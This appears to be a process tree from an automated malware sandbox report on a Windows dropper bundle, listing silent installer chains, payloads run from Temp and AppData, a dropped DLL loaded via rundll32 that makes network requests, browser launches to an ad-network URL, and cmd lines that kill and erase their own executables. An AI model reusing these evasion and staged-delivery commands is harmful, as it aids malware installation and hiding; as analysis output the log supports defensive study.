C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe4⤵PID:1076
-
C:\Users\Admin\AppData\Local\Temp\7zS88205AF1\Sun1905815e51282417.exeSun1905815e51282417.exe5⤵PID:1856
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-AGF62.tmp\Sun1966fb31dd5a07.tmp"C:\Users\Admin\AppData\Local\Temp\is-AGF62.tmp\Sun1966fb31dd5a07.tmp" /SL5="$3015E,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS88205AF1\Sun1966fb31dd5a07.exe"1⤵PID:1636
-
C:\Users\Admin\AppData\Local\Temp\is-MEHHB.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-MEHHB.tmp\Ze2ro.exe" /S /UID=burnerch22⤵PID:2600
-
C:\Program Files\Java\HYCLVJUVYG\ultramediaburner.exe"C:\Program Files\Java\HYCLVJUVYG\ultramediaburner.exe" /VERYSILENT3⤵PID:4228
-
C:\Users\Admin\AppData\Local\Temp\is-N8LHV.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-N8LHV.tmp\ultramediaburner.tmp" /SL5="$2037A,281924,62464,C:\Program Files\Java\HYCLVJUVYG\ultramediaburner.exe" /VERYSILENT4⤵PID:4248
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu5⤵PID:1008
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\67-c96b9-d95-7c389-ffb3f30014aa2\Caeqymokuxi.exe"C:\Users\Admin\AppData\Local\Temp\67-c96b9-d95-7c389-ffb3f30014aa2\Caeqymokuxi.exe"3⤵PID:3240
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e64⤵PID:5020
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5020 CREDAT:275457 /prefetch:25⤵PID:4396
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad4⤵PID:3636
-
-
-
C:\Users\Admin\AppData\Local\Temp\8d-87dbe-61b-66ba2-8d54b295e0edb\Minulybuzhae.exe"C:\Users\Admin\AppData\Local\Temp\8d-87dbe-61b-66ba2-8d54b295e0edb\Minulybuzhae.exe"3⤵PID:3800
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3jk2pg00.taa\GcleanerEU.exe /eufive & exit4⤵PID:4092
-
C:\Users\Admin\AppData\Local\Temp\3jk2pg00.taa\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\3jk2pg00.taa\GcleanerEU.exe /eufive5⤵PID:5116
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\3jk2pg00.taa\GcleanerEU.exe" & exit6⤵PID:2684
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f7⤵
- Kills process with taskkill
PID:1460
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2x02meji.43z\installer.exe /qn CAMPAIGN="654" & exit4⤵PID:3704
-
C:\Users\Admin\AppData\Local\Temp\2x02meji.43z\installer.exeC:\Users\Admin\AppData\Local\Temp\2x02meji.43z\installer.exe /qn CAMPAIGN="654"5⤵PID:4688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zb41udof.qev\anyname.exe & exit4⤵PID:2968
-
C:\Users\Admin\AppData\Local\Temp\zb41udof.qev\anyname.exeC:\Users\Admin\AppData\Local\Temp\zb41udof.qev\anyname.exe5⤵PID:2600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ks4pqlx5.fde\gcleaner.exe /mixfive & exit4⤵PID:3836
-
C:\Users\Admin\AppData\Local\Temp\ks4pqlx5.fde\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ks4pqlx5.fde\gcleaner.exe /mixfive5⤵PID:4516
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ks4pqlx5.fde\gcleaner.exe" & exit6⤵PID:4040
-
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
PID:1228 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3884
-
-
C:\Users\Admin\AppData\Local\Temp\B663.exeC:\Users\Admin\AppData\Local\Temp\B663.exe1⤵PID:4532
-
C:\Users\Admin\AppData\Local\Temp\A045.exeC:\Users\Admin\AppData\Local\Temp\A045.exe1⤵PID:3468
-
C:\Users\Admin\AppData\Local\Temp\A045.exeC:\Users\Admin\AppData\Local\Temp\A045.exe2⤵PID:4848
-
-
C:\Users\Admin\AppData\Local\Temp\118E.exeC:\Users\Admin\AppData\Local\Temp\118E.exe1⤵PID:4768
-
C:\Users\Admin\AppData\Local\Temp\65E6.exeC:\Users\Admin\AppData\Local\Temp\65E6.exe1⤵PID:4696
-
C:\Users\Admin\AppData\Local\Temp\65E6.exeC:\Users\Admin\AppData\Local\Temp\65E6.exe2⤵PID:3044
-
-
C:\Users\Admin\AppData\Local\Temp\5D11.exeC:\Users\Admin\AppData\Local\Temp\5D11.exe1⤵PID:4220
-
C:\Windows\system32\taskeng.exetaskeng.exe {F6BD552D-D0B1-485B-8AD6-754243A08583} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]1⤵PID:2940
-
C:\Users\Admin\AppData\Roaming\fifvejsC:\Users\Admin\AppData\Roaming\fifvejs2⤵PID:3056
-
-
C:\Users\Admin\AppData\Roaming\urfvejsC:\Users\Admin\AppData\Roaming\urfvejs2⤵PID:4968
-
-
C:\Users\Admin\AppData\Local\Temp\3B11.exeC:\Users\Admin\AppData\Local\Temp\3B11.exe1⤵PID:3896
-
C:\Users\Admin\AppData\Local\Temp\8210.exeC:\Users\Admin\AppData\Local\Temp\8210.exe1⤵PID:4304